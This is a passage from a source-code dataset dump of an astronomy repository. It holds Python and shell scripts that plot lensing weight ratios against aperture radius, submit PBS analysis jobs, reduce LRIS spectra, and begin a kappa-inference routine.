(bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'${\\zeta_\\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\n\ncols=29\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,18)\nrangemax=4\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,18)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\n\ncols=31\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,19)\nrangemax=7\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,19)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6, direction='up')\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_sizeplots_%s_i%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW1_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size120_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size90_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size60_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_50_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW1_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW2_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW3_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\nos.system(\"rm fieldshistW4_75_%s_%s_size45_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])))\n\nif str(sys.argv[2]) == \"samp\":\n print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.679347813129425, "alphanum_fraction": 0.7699275612831116, "avg_line_length": 26.600000381469727, "blob_id": "392dab078aaae919a402150d5aedf69e23687f41", "content_id": "fa8745eabf37e61bf4925eb1a0d64016e2459ff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 552, "license_type": "no_license", "max_line_length": 79, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim8.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log8s.out\n#PBS -e Log8s.err\n#PBS -N 8s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr zoverr\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr zoverr\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr zoverr\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr zoverr\n" }, { "alpha_fraction": 0.6571969985961914, "alphanum_fraction": 0.7026515007019043, "avg_line_length": 25.350000381469727, "blob_id": "d2c4f16d456bcdb0297857caa4e34478218c1f49", "content_id": "2fb898632da220c5687d31ac6bb1556d88e30d5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 528, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/python/reduction_utilities/LRISlongslitredux.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "from LRIS.resample import resample\nimport pyfits,numpy\nfrom LRIS.LRIStools import *\nfrom LRIS.XSolve import *\n\nindir = 'data'\npref = 'r110501_'\nflat = 41 \narc = 36\noutname = 'red_top'\nslitID(indir,pref,[flat,arc,67],outname,side='top',slits=[[50,100]])\noldName = None\nsf = True\nfor img in [67,68,69]:\n newName = '%s_%2d'%(outname,img)\n XSolve(outname,newName,indir,pref,[flat,arc,img])\n SlitCross(newName)\n WaveSolve(newName,oldName,showFit=sf)\n resample(newName,nobgsub=True,clobber=True)\n oldName = newName\n\n" }, { "alpha_fraction": 0.590628981590271, "alphanum_fraction": 0.6349858641624451, "avg_line_length": 62.05601119995117, "blob_id": "e976813939a153771d5fc90f0b20adc7eb4893cc", "content_id": "f7a6332d092214975bf068b04536db25335cd4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 54039, "license_type": "no_license", "max_line_length": 761, "num_lines": 857, "path": "/python/catalogue_utilities/inferkappa_unbiasedwithshearFITSio_testonly.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu July 21 2018\n# NEED MAKE CHANGES WHEN RUNNING ALL BUT J1206 BECAUSE I WILL HAVE DIFFERENT INPUT FILES AND COLUMNS FOR 23 and 24\n# Run as python /lfs08/rusucs/code/inferkappa_unbiasedwithshearFITSio_testonly.py WFI2033 -1.0 -1.0 nohandpicked fiducial 5 45 23 measured med gal gamma oneoverr mass\n# It does not accept mixed radii or selecting empty inner radii. When a single radius is used (not mixing different radii constraints) this code is faster than inferkappa_unbiasedwithshear45and120_23or24_allowsemptymskandJ1206 because it doesn't read the id column\n# The input weight files have to be FITS files. In case of multiple data extensions, data is combined from every extension\n# J1206 is considered separately because their the input weight files do not include columns which use mass\n# Description of arguments: inferkappa_unbiasedwithshear.py lens radius maglim innermask sum/meds gal list_of_weight_constraints\n# weight1 should always be \"gal\", in order to use the galaxy counts when correcting the bias due to different LOS\n# the code is written such that, if shear is used as overdensity, it should be the second weight used (unless only one weight is used);\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\nimport fitsio # https://github.com/esheldon/fitsio\n\nstart_time=time.time()\n\nlens = str(sys.argv[1])\nzinf = str(sys.argv[2])\nzsup = str(sys.argv[3])\nhandpicked = 